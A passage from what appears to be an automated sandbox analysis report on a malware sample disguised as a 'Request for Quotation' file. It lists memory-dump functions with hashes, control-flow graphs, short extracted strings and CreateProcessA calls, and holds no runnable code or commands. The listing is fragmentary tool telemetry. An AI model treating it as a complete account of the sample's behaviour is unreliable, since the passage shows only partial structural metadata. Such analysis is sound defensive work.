                                                • Opcode Fuzzy Hash: ba4f77b51d993cccd3682bd6128fea68b4ebfe688457d4c0b21828b88f3f998a
                                                • Instruction Fuzzy Hash: C2913874D15218CFEB94DFA9D484BADBBF6EB89310F10906DE409A3291DB34AE45CF80
                                                Function 063C4C6A Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 765f15aede8f6a694ce3e6a08b83c8c6039e30661dffc4240a3fff19450fea12
                                                • Instruction ID: e49ee63fe546b59fef349b48aaadcb735b221e8b888718ecf084fca518bc1555
                                                • Opcode Fuzzy Hash: 765f15aede8f6a694ce3e6a08b83c8c6039e30661dffc4240a3fff19450fea12
                                                • Instruction Fuzzy Hash: E9712774E012089FDB84DFA9D554AAEBBF6FF88300F10C069E509AB355DB34AE45CB91
                                                Function 0637D800 Relevance: .2, Instructions: 155COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5322bd723f42a56ca642af21dd8b8cb61dae5da83a62e705417f283aa40820c
                                                • Instruction ID: 2c9586ed28eff56870391145ae30552e31c5016b679ea5893a7aa69b90233544
                                                • Opcode Fuzzy Hash: c5322bd723f42a56ca642af21dd8b8cb61dae5da83a62e705417f283aa40820c
                                                • Instruction Fuzzy Hash: 4871C2B0D05218CFEB64CF9AC948BDDBBF2BF89300F0491A9D449AB254D7785985CF91
                                                Function 0637D7F0 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecf8d463dcbb49ba405664f508e5f6e99b9a2d04e6c78aa18ead2a2c5e9a4d28
                                                • Instruction ID: 9aabc5879bee1c7b2ada1c1581b8ebb1f9d2c803ed15db8befd4e4547be49c94
                                                • Opcode Fuzzy Hash: ecf8d463dcbb49ba405664f508e5f6e99b9a2d04e6c78aa18ead2a2c5e9a4d28
                                                • Instruction Fuzzy Hash: 2951A0B0D05218CFEB68CF9AC944BDEBBF2BF89300F0491AAD409AB254D7785985CF51
                                                Function 0623003F Relevance: .1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9cb56f4664c12c88a30bd227327f63a8cfcd4957737714ae933585751b18d54
                                                • Instruction ID: 0ff0bacae98e7aa2a0d7e018d5ade5ed4af2d8c8a9447b001ce459a2707ed6c5
                                                • Opcode Fuzzy Hash: c9cb56f4664c12c88a30bd227327f63a8cfcd4957737714ae933585751b18d54
                                                • Instruction Fuzzy Hash: E951DDB1E106298BEB18CF6BC94469EFAF3BFC8304F14C1BAD508A7254DB745A81CE54
                                                Function 0623D1C0 Relevance: 4.2, Strings: 3, Instructions: 480COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1164 623d1c0-623d1e8 1166 623d236-623d244 1164->1166 1167 623d1ea-623d231 1164->1167 1168 623d253 1166->1168 1169 623d246-623d251 1166->1169 1212 623d68d-623d694 1167->1212 1171 623d255-623d25c 1168->1171 1169->1171 1174 623d262-623d266 1171->1174 1175 623d345-623d349 1171->1175 1178 623d695-623d6bd 1174->1178 1179 623d26c-623d270 1174->1179 1176 623d34b-623d35a 1175->1176 1177 623d39f-623d3a9 1175->1177 1190 623d35e-623d363 1176->1190 1180 623d3e2-623d408 1177->1180 1181 623d3ab-623d3ba 1177->1181 1187 623d6c4-623d6ee 1178->1187 1183 623d282-623d2e0 1179->1183 1184 623d272-623d27c 1179->1184 1206 623d415 1180->1206 1207 623d40a-623d413 1180->1207 1194 623d3c0-623d3dd 1181->1194 1195 623d6f6-623d70c 1181->1195 1219 623d753-623d77d 1183->1219 1220 623d2e6-623d340 1183->1220 1184->1183 1184->1187 1187->1195 1196 623d365-623d39a 1190->1196 1197 623d35c 1190->1197 1194->1212 1221 623d714-623d74c 1195->1221 1196->1212 1197->1190 1211 623d417-623d43f 1206->1211 1207->1211 1225 623d510-623d514 1211->1225 1226 623d445-623d45e 1211->1226 1231 623d787-623d78d 1219->1231 1232 623d77f-623d785 1219->1232 1220->1212 1221->1219 1229 623d516-623d52f 1225->1229 1230 623d58e-623d598 1225->1230 1226->1225 1251 623d464-623d473 1226->1251 1229->1230 1255 623d531-623d540 1229->1255 1235 623d5f5-623d5fe 1230->1235 1236 623d59a-623d5a4 1230->1236 1232->1231 1234 623d78e-623d7cb 1232->1234 1240 623d600-623d62e 1235->1240 1241 623d636-623d683 1235->1241 1249 623d5a6-623d5a8 1236->1249 1250 623d5aa-623d5bc 1236->1250 1240->1241 1260 623d68b 1241->1260 1256 623d5be-623d5c0 1249->1256 1250->1256 1269 623d475-623d47b 1251->1269 1270 623d48b-623d4a0 1251->1270 1274 623d542-623d548 1255->1274 1275 623d558-623d563 1255->1275 1258 623d5c2-623d5c6 1256->1258 1259 623d5ee-623d5f3 1256->1259 1264 623d5e4-623d5e7 1258->1264 1265 623d5c8-623d5e1 1258->1265 1259->1235 1259->1236 1260->1212 1264->1259 1265->1264 1276 623d47f-623d481 1269->1276 1277 623d47d 1269->1277 1272 623d4a2-623d4ce 1270->1272 1273 623d4d4-623d4dd 1270->1273 1272->1221 1272->1273 1273->1219 1281 623d4e3-623d50a 1273->1281 1282 623d54a 1274->1282 1283 623d54c-623d54e 1274->1283 1275->1219 1284 623d569-623d58c 1275->1284 1276->1270 1277->1270 1281->1225 1281->1251 1282->1275 1283->1275 1284->1230 1284->1255
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hiq$Hiq$Hiq
                                                • API String ID: 0-3012148416
                                                • Opcode ID: a219f2539b4e36bf5eb66965cbd1eb149e6352240f6411f00cb02c781a5c78c9
                                                • Instruction ID: b578b33412355b0981f694337691a0ef04589158b37b0ece0696ea624a257d1f
                                                • Opcode Fuzzy Hash: a219f2539b4e36bf5eb66965cbd1eb149e6352240f6411f00cb02c781a5c78c9
                                                • Instruction Fuzzy Hash: 40127F70A102169FCB65DFA5C884A6EBBF6FF84300F14892DE9069B395DB31ED45CB90
                                                Function 0623EE88 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1295 623ee88-623eec5 1297 623eee7-623eefd call 623ec90 1295->1297 1298 623eec7-623eeca 1295->1298 1304 623f273-623f287 1297->1304 1305 623ef03-623ef0f 1297->1305 1409 623eecc call 623f7e8 1298->1409 1410 623eecc call 623f7f8 1298->1410 1301 623eed2-623eed4 1301->1297 1302 623eed6-623eede 1301->1302 1302->1297 1312 623f2c7-623f2d0 1304->1312 1306 623f040-623f047 1305->1306 1307 623ef15-623ef18 1305->1307 1310 623f176-623f1b0 call 623e698 1306->1310 1311 623f04d-623f056 1306->1311 1309 623ef1b-623ef24 1307->1309 1313 623ef2a-623ef3e 1309->1313 1314 623f368 1309->1314 1413 623f1b3 call 6370a70 1310->1413 1414 623f1b3 call 6370a60 1310->1414 1311->1310 1316 623f05c-623f168 call 623e698 call 623ec28 call 623e698 1311->1316 1317 623f2d2-623f2d9 1312->1317 1318 623f295-623f29e 1312->1318 1331 623f030-623f03a 1313->1331 1332 623ef44-623efd9 call 623ec90 * 2 call 623e698 call 623ec28 call 623ecd0 call 623ed78 call 623ede0 1313->1332 1320 623f36d-623f371 1314->1320 1406 623f173-623f174 1316->1406 1407 623f16a 1316->1407 1324 623f327-623f32e 1317->1324 1325 623f2db-623f31e call 623e698 1317->1325 1318->1314 1322 623f2a4-623f2b6 1318->1322 1326 623f373 1320->1326 1327 623f37c 1320->1327 1340 623f2c6 1322->1340 1341 623f2b8-623f2bd 1322->1341 1329 623f353-623f366 1324->1329 1330 623f330-623f340 1324->1330 1325->1324 1326->1327 1339 623f37d 1327->1339 1329->1320 1330->1329 1345 623f342-623f34a 1330->1345 1331->1306 1331->1309 1385 623efdb-623eff3 call 623ed78 call 623e698 call 623e948 1332->1385 1386 623eff8-623f02b call 623ede0 1332->1386 1339->1339 1340->1312 1411 623f2c0 call 6371210 1341->1411 1412 623f2c0 call 6371200 1341->1412 1345->1329 1354 623f1b9-623f26a call 623e698 1354->1304 1385->1386 1386->1331 1406->1310 1407->1406 1409->1301 1410->1301 1411->1340 1412->1340 1413->1354 1414->1354
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq$4'eq
                                                • API String ID: 0-3023824364
                                                • Opcode ID: dc0d3763f50cd3eea64e5142f627e3090b8abaaa144e92b97ff5c86471461834
                                                • Instruction ID: 06be5ae49b00395a6d94db19ffa3328acdd416fe6a9f76982d426168381e0e74
                                                • Opcode Fuzzy Hash: dc0d3763f50cd3eea64e5142f627e3090b8abaaa144e92b97ff5c86471461834
                                                • Instruction Fuzzy Hash: EDF1FD74A10219CFCB44DFA4D994E9DBBB2FF88300F158559E906AB3A5DB70EC46CB40
                                                Function 063A0B16 Relevance: 3.8, Strings: 3, Instructions: 45COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1587 63a0b16-63a0b5a 1608 63a0b5d call 63c5e18 1587->1608 1609 63a0b5d call 63c5e20 1587->1609 1589 63a0b5f-63a0b6c 1590 63a0b72-63a0b94 1589->1590 1591 63a1971-63a19a7 1589->1591 1592 63a0b9a-63a0ba5 1590->1592 1593 63a09b5-63a09be 1590->1593 1591->1593 1597 63a19ad-63a19b8 1591->1597 1592->1593 1595 63a09c0-63a0f08 1593->1595 1596 63a09c7-63a193b 1593->1596 1595->1593 1607 63a0f0e-63a0f19 1595->1607 1596->1593 1605 63a1941-63a194c 1596->1605 1597->1593 1605->1593 1607->1593 1608->1589 1609->1589
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177249405.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63a0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !$'$4
                                                • API String ID: 0-4170026166
                                                • Opcode ID: 48e996304f83135d5da13146c373a204a1fa5a3d50575168d4a31f60de19d2d2
                                                • Instruction ID: f1f791511a2446bd3d2f88524f4bfde972563de77323d315b65c5fee8ef11332
                                                • Opcode Fuzzy Hash: 48e996304f83135d5da13146c373a204a1fa5a3d50575168d4a31f60de19d2d2
                                                • Instruction Fuzzy Hash: F4215E74D05269CFEBA4CF54C984BECBBB1BB09314F0040EAD948A7251D7755AC5DF80
                                                Function 061B0D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176425599.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_61b0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq
                                                • API String ID: 0-907361030
                                                • Opcode ID: 48e461d5428fdeb42b50fa68bc1029ee061fffb7f426ebf950e3f82dd0a4dde6
                                                • Instruction ID: 1349195bec5ce227efead475448c6fcb3dd64410315a4e5edd8392f98fa5f852
                                                • Opcode Fuzzy Hash: 48e461d5428fdeb42b50fa68bc1029ee061fffb7f426ebf950e3f82dd0a4dde6
                                                • Instruction Fuzzy Hash: 27421574E0020ADFDB98DBA5C4996EEBBB2FF49301F219419D512A7394C7349D82CF90
                                                Function 061B1DA8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1932 61b1da8-61b1dd3 1933 61b1dda-61b1df9 1932->1933 1934 61b1dd5 1932->1934 1935 61b1dfb-61b1e04 1933->1935 1936 61b1e1a 1933->1936 1934->1933 1937 61b1e0b-61b1e0e 1935->1937 1938 61b1e06-61b1e09 1935->1938 1939 61b1e1d-61b1e21 1936->1939 1940 61b1e18 1937->1940 1938->1940 1941 61b23dc-61b23f3 1939->1941 1940->1939 1943 61b23f9-61b23fd 1941->1943 1944 61b1e26-61b1e2a 1941->1944 1947 61b23ff-61b242f 1943->1947 1948 61b2432-61b2436 1943->1948 1945 61b1e2f-61b1e33 1944->1945 1946 61b1e2c-61b1e87 1944->1946 1950 61b1e5c-61b1e7e 1945->1950 1951 61b1e35-61b1e59 1945->1951 1954 61b1e89-61b1ee5 1946->1954 1955 61b1e8c-61b1e90 1946->1955 1947->1948 1952 61b2438-61b2441 1948->1952 1953 61b2457 1948->1953 1950->1941 1951->1950 1957 61b2448-61b244b 1952->1957 1958 61b2443-61b2446 1952->1958 1959 61b245a-61b2460 1953->1959 1967 61b1eea-61b1eee 1954->1967 1968 61b1ee7-61b1f48 1954->1968 1962 61b1eb9-61b1edc 1955->1962 1963 61b1e92-61b1eb6 1955->1963 1960 61b2455 1957->1960 1958->1960 1960->1959 1962->1941 1963->1962 1970 61b1ef0-61b1efd 1967->1970 1971 61b1f17-61b1f2e 1967->1971 1977 61b1f4a-61b1fa6 1968->1977 1978 61b1f4d-61b1f51 1968->1978 1994 61b1f06-61b1f14 1970->1994 1987 61b1f3e-61b1f3f 1971->1987 1988 61b1f30-61b1f36 1971->1988 1989 61b1fab-61b1faf 1977->1989 1990 61b1fa8-61b2004 1977->1990 1980 61b1f7a-61b1f9d 1978->1980 1981 61b1f53-61b1f77 1978->1981 1980->1941 1981->1980 1987->1941 1988->1987 1991 61b1fd8-61b1ffb 1989->1991 1992 61b1fb1-61b1fd5 1989->1992 1998 61b2009-61b200d 1990->1998 1999 61b2006-61b2062 1990->1999 1991->1941 1992->1991 1994->1971 2006 61b200f-61b2033 1998->2006 2007 61b2036-61b2059 1998->2007 2008 61b2067-61b206b 1999->2008 2009 61b2064-61b20c0 1999->2009 2006->2007 2007->1941 2016 61b206d-61b2091 2008->2016 2017 61b2094-61b20b7 2008->2017 2018 61b20c2-61b2123 2009->2018 2019 61b20c5-61b20c9 2009->2019 2016->2017 2017->1941 2028 61b2128-61b212c 2018->2028 2029 61b2125-61b218d 2018->2029 2026 61b20cb-61b20ef 2019->2026 2027 61b20f2-61b2109 2019->2027 2026->2027 2038 61b210b-61b2111 2027->2038 2039 61b2119-61b211a 2027->2039 2035 61b212e-61b215e 2028->2035 2036 61b2161-61b2184 2028->2036 2040 61b218f-61b21f7 2029->2040 2041 61b2192-61b2196 2029->2041 2035->2036 2036->1941 2038->2039 2039->1941 2049 61b21f9-61b2261 2040->2049 2050 61b21fc-61b2200 2040->2050 2046 61b21cb-61b21ee 2041->2046 2047 61b2198-61b21c8 2041->2047 2046->1941 2047->2046 2059 61b2263-61b22cb 2049->2059 2060 61b2266-61b226a 2049->2060 2056 61b2202-61b2232 2050->2056 2057 61b2235-61b2258 2050->2057 2056->2057 2057->1941 2069 61b22cd-61b2335 2059->2069 2070 61b22d0-61b22d4 2059->2070 2066 61b229f-61b22c2 2060->2066 2067 61b226c-61b229c 2060->2067 2066->1941 2067->2066 2079 61b233a-61b233e 2069->2079 2080 61b2337-61b239c 2069->2080 2075 61b2309-61b232c 2070->2075 2076 61b22d6-61b2306 2070->2076 2075->1941 2076->2075 2085 61b2373-61b2396 2079->2085 2086 61b2340-61b2370 2079->2086 2089 61b239e-61b23ce 2080->2089 2090 61b23d1-61b23d4 2080->2090 2085->1941 2086->2085 2089->2090 2090->1941
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176425599.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_61b0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq
                                                • API String ID: 0-907361030
                                                • Opcode ID: 7a99a68fa30530d2cdc9536f732d9f3c748691d58d05fa454faee50235699da0
                                                • Instruction ID: 018a5d1b4f97b55171356cbaad64c97154d0a22b570027d74e94d4c01b9361ff
                                                • Opcode Fuzzy Hash: 7a99a68fa30530d2cdc9536f732d9f3c748691d58d05fa454faee50235699da0
                                                • Instruction Fuzzy Hash: 3D221630D10219CFCBA5DFA5C9546ECB7B6FF4A301F609569D40AAB294CB395E89CF40
                                                Function 061B1598 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2191 61b1598-61b15bd 2193 61b15bf 2191->2193 2194 61b15c4-61b15e1 2191->2194 2193->2194 2195 61b15e3-61b15ec 2194->2195 2196 61b1602 2194->2196 2198 61b15ee-61b15f1 2195->2198 2199 61b15f3-61b15f6 2195->2199 2197 61b1605-61b1609 2196->2197 2201 61b1824-61b183b 2197->2201 2200 61b1600 2198->2200 2199->2200 2200->2197 2203 61b160e-61b1612 2201->2203 2204 61b1841-61b1845 2201->2204 2207 61b161a-61b161e 2203->2207 2208 61b1614-61b16b2 2203->2208 2205 61b186f-61b1873 2204->2205 2206 61b1847-61b186c 2204->2206 2210 61b1875-61b187e 2205->2210 2211 61b1894 2205->2211 2206->2205 2212 61b1648-61b166d 2207->2212 2213 61b1620-61b162d 2207->2213 2214 61b16ba-61b16be 2208->2214 2215 61b16b4-61b1752 2208->2215 2217 61b1880-61b1883 2210->2217 2218 61b1885-61b1888 2210->2218 2219 61b1897-61b189d 2211->2219 2238 61b166f-61b1678 2212->2238 2239 61b168e 2212->2239 2275 61b1630 call 6376e70 2213->2275 2276 61b1630 call 6376e80 2213->2276 2221 61b16e8-61b170d 2214->2221 2222 61b16c0-61b16e5 2214->2222 2227 61b175a-61b175e 2215->2227 2228 61b1754-61b17ef 2215->2228 2224 61b1892 2217->2224 2218->2224 2253 61b170f-61b1718 2221->2253 2254 61b172e 2221->2254 2222->2221 2224->2219 2232 61b1788-61b17ad 2227->2232 2233 61b1760-61b1785 2227->2233 2236 61b1819-61b181c 2228->2236 2237 61b17f1-61b1816 2228->2237 2265 61b17af-61b17b8 2232->2265 2266 61b17ce 2232->2266 2233->2232 2235 61b1636-61b1645 2235->2212 2236->2201 2237->2236 2244 61b167a-61b167d 2238->2244 2245 61b167f-61b1682 2238->2245 2246 61b1691-61b1698 2239->2246 2250 61b168c 2244->2250 2245->2250 2251 61b169a-61b16a0 2246->2251 2252 61b16a8-61b16a9 2246->2252 2250->2246 2251->2252 2252->2201 2256 61b171a-61b171d 2253->2256 2257 61b171f-61b1722 2253->2257 2258 61b1731-61b1738 2254->2258 2261 61b172c 2256->2261 2257->2261 2262 61b173a-61b1740 2258->2262 2263 61b1748-61b1749 2258->2263 2261->2258 2262->2263 2263->2201 2268 61b17ba-61b17bd 2265->2268 2269 61b17bf-61b17c2 2265->2269 2270 61b17d1-61b17d8 2266->2270 2272 61b17cc 2268->2272 2269->2272 2273 61b17da-61b17e0 2270->2273 2274 61b17e8-61b17e9 2270->2274 2272->2270 2273->2274 2274->2201 2275->2235 2276->2235
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176425599.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_61b0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq$4'eq
                                                • API String ID: 0-907361030
                                                • Opcode ID: 2f52eddf999661eb96e088564bc4869f6bab40777d2541d2c859669eccca5923
                                                • Instruction ID: cbd2e056b6b99fdee651b34c23eeaa9dd3b7c69a8c0fca6d492f54385efa980e
                                                • Opcode Fuzzy Hash: 2f52eddf999661eb96e088564bc4869f6bab40777d2541d2c859669eccca5923
                                                • Instruction Fuzzy Hash: 96A12434E00209DFDB58DFA5D46A6EDBBB2FF89311F159429D402A7390CB785982CF90
                                                Function 0639E868 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2277 639e868-639e87a 2278 639e96e-639e993 2277->2278 2279 639e880-639e882 2277->2279 2281 639e99a-639e9be 2278->2281 2280 639e888-639e894 2279->2280 2279->2281 2286 639e8a8-639e8b8 2280->2286 2287 639e896-639e8a2 2280->2287 2293 639e9c5-639e9e9 2281->2293 2292 639e8be-639e8cc 2286->2292 2286->2293 2287->2286 2287->2293 2298 639e9f0-639ea73 2292->2298 2299 639e8d2-639e8d7 2292->2299 2293->2298 2321 639ea7a-639ea88 call 639db70 2298->2321 2322 639ea75 call 639b8c8 2298->2322 2332 639e8d9 call 639ea58 2299->2332 2333 639e8d9 call 639e868 2299->2333 2334 639e8d9 call 639e858 2299->2334 2301 639e8df-639e928 2316 639e94b-639e96b call 639c970 2301->2316 2317 639e92a-639e943 2301->2317 2317->2316 2328 639ea8a-639ea90 2321->2328 2329 639eaa0-639eaa2 2321->2329 2322->2321 2330 639ea92 2328->2330 2331 639ea94-639ea96 2328->2331 2330->2329 2331->2329 2332->2301 2333->2301 2334->2301
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (iq$Hiq
                                                • API String ID: 0-2459830773
                                                • Opcode ID: d3f67c10db0b573d2fc18bf863ad78238f9cb22675da0c113bdc85bd44751ce2
                                                • Instruction ID: 9a966497ecc47e1d05d86e309c356101c449b2b3520a2f8120528bf709a1564b
                                                • Opcode Fuzzy Hash: d3f67c10db0b573d2fc18bf863ad78238f9cb22675da0c113bdc85bd44751ce2
                                                • Instruction Fuzzy Hash: A4518930B002119FCBA9EF39C45462E7BB7EF85300B20446DD9069B3A1DE35ED46CBA1
                                                Function 063A1526 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2437 63a1526-63a1527 2438 63a1529-63a1582 2437->2438 2439 63a15a5-63a15ec 2437->2439 2438->2439 2448 63a15ef call 63c5e18 2439->2448 2449 63a15ef call 63c5e20 2439->2449 2443 63a15f1-63a15fe 2444 63a1951-63a19d5 2443->2444 2445 63a1604-63a1605 2443->2445 2445->2444 2448->2443 2449->2443
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177249405.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63a0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: '$<
                                                • API String ID: 0-482612310
                                                • Opcode ID: b37df83db284ffd0197e2d697ecbbd1f8a36f1867993b4a5f0d18daadab9480b
                                                • Instruction ID: 59a9cf52ba2604be4bb5090960956141f2f388855ebadec7e626b20fec6403ec
                                                • Opcode Fuzzy Hash: b37df83db284ffd0197e2d697ecbbd1f8a36f1867993b4a5f0d18daadab9480b
                                                • Instruction Fuzzy Hash: 2021CDB4D04229CFEB65CF64CD48BE9BBB5FB0A304F1042E9994AA7251D7325A81DF84
                                                Function 06677C4C Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: m$w
                                                • API String ID: 0-2160559192
                                                • Opcode ID: 1ab30e06dd3ca44d1d4f7b3287254ba5c369b20c633e08a786f2fd08043c4964
                                                • Instruction ID: b7153067c3ba4bc4099ca47e06d94c2c7e1d43afa46d4ddabc1b8c0d34420b4d
                                                • Opcode Fuzzy Hash: 1ab30e06dd3ca44d1d4f7b3287254ba5c369b20c633e08a786f2fd08043c4964
                                                • Instruction Fuzzy Hash: 1301C4B4A14229CFDBA0DF68C888BDDB7B5BB08344F0144D5E459A73A0DB34AE84DF50
                                                Function 0668EC28 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,iq
                                                • API String ID: 0-1887606315
                                                • Opcode ID: db26d1d5be678249f94e211bd6d3fd927f0c1451acf4d8ded188bcc4f94cf1bd
                                                • Instruction ID: c3568a54328d363ffbbddf8bec1f0bd926fb90a245061e92a6ee5f029e6f59dc
                                                • Opcode Fuzzy Hash: db26d1d5be678249f94e211bd6d3fd927f0c1451acf4d8ded188bcc4f94cf1bd
                                                • Instruction Fuzzy Hash: 3752F875A102288FDB64DF69C945BADBBF2BF88300F1581D9E509A7351DA309E81CFA1
                                                Function 063C55F5 Relevance: 1.7, APIs: 1, Instructions: 204processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063C57DA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 9ac1d85b18f36c53fe416b9bd2d5d65c07616e73f2c5b40cf97773529e0128ab
                                                • Instruction ID: 691575edfd25c0e7a8d4cba84b1c703b27a6d69df74c90f1754defa68fb54b9f
                                                • Opcode Fuzzy Hash: 9ac1d85b18f36c53fe416b9bd2d5d65c07616e73f2c5b40cf97773529e0128ab
                                                • Instruction Fuzzy Hash: 97814671E106198FDB50CFA9C9817AEBBF2BF48320F148529E859E7240DB749895CF81
                                                Function 063C5600 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063C57DA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 82f216c7824df4c1458278c6cfe913ff2369d4f28c703c9585ade1d13dba0ff2
                                                • Instruction ID: f696ec6f5193072cc67edc7ff9ed15e1b6a8c2d5c111805a23ef1ac179f622a3
                                                • Opcode Fuzzy Hash: 82f216c7824df4c1458278c6cfe913ff2369d4f28c703c9585ade1d13dba0ff2
                                                • Instruction Fuzzy Hash: 28814671E106198FDB50CFA9C8817AEBBF2FF48320F148529E859E7244DB74A895CF81
                                                Function 06370040 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
